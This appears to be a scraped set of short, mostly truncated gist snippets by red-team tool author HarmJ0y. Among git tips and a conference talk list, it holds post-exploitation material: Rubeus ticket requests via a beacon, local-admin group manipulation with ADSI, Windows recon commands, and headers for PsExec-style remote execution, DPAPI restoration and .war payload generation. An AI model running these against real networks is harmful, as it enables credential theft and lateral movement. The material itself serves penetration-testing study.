HarmJ0y

##### IF ELEVATED:

# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi

# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter

HarmJ0y

Show remote branches:
	git branch -v -a	

To check out the remote branch:
	http://stackoverflow.com/questions/1783405/checkout-remote-git-branch
	git fetch
	git checkout <branch>

HarmJ0y

function Restore-UserDPAPI {
<#
    .SYNOPSIS

        Restores a user account's DPAPI master key on a new system.

        Author: @harmj0y
        License: BSD 3-Clause
        Required Dependencies: None
        Optional Dependencies: None

HarmJ0y

Windows version:
	reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Users who have authed to the system:
	ls C:\Users\

System env variables:
	reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

Saved outbound RDP connections:

HarmJ0y

# Add a domain user to a remote server local group, if your current user has admin over the remote machine
powershell -c ([ADSI]'WinNT://SERVER/Administrators,group').add('WinNT://DOMAIN/USER,user')

# Get all local groups on a remote server
powershell -c "([ADSI]'WinNT://SERVER,computer').psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0]}"

# Find members of the local Administrators group on a remote server
powershell -c "$([ADSI]'WinNT://SERVER/Administrators,group').psbase.Invoke('Members') | foreach { $_.GetType().InvokeMember('ADspath', 'GetProperty', $null, $_, $null).Replace('WinNT://', '') }"

# Enable the local Administrator account on a remote server

HarmJ0y

function ConvertFrom-UserParameter {
<#
.SYNOPSIS

Converts a userparameters encoded blob into an ordered dictionary of decoded values.

Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None

HarmJ0y

BSides LV 2015 - "Building an Empire with PowerShell" - https://www.youtube.com/watch?v=Pq9t59w0mUI

BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" - https://www.youtube.com/watch?v=xHkRhRo3l8o
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" - https://www.youtube.com/watch?v=RcDq9GgiUB4

PowerShell Summit 2016 - "Digital Forensics with PowerShell" - https://www.youtube.com/watch?v=gm9A7FaWTkY

BSides LV 2016 - "Building an EmPyre with Python" - https://www.youtube.com/watch?v=79qzgVTP3Yc

DerbyCon 2016 - "A Year in the Empire" - https://www.youtube.com/watch?v=ngvHshHCt_8

HarmJ0y

function Invoke-PsExec {
    <#
    .SYNOPSIS
    This function is a rough port of Metasploit's psexec functionality.
    It utilizes Windows API calls to open up the service manager on
    a remote machine, creates/run a service with an associated binary
    path or command, and then cleans everything up.

    Either a -Command or a custom -ServiceEXE can be specified.
    For -Commands, a -ResultsFile can also be specified to retrieve the

HarmJ0y

#!/usr/bin/python

# Code that quickly generates a deployable .war for a PowerShell one-liner

import zipfile
import StringIO
import sys

def generatePsWar(psCmd, appName):

HarmJ0y

Function Invoke-HostFile {
    <#
        .SYNOPSIS
            
            Hosts a base64 string representation of a binary file or a given
            $FilePath on the specified $Port. Any HTTP request to the given 
            host/port will return the binary data of the specified file.

        .PARAMETER Base64File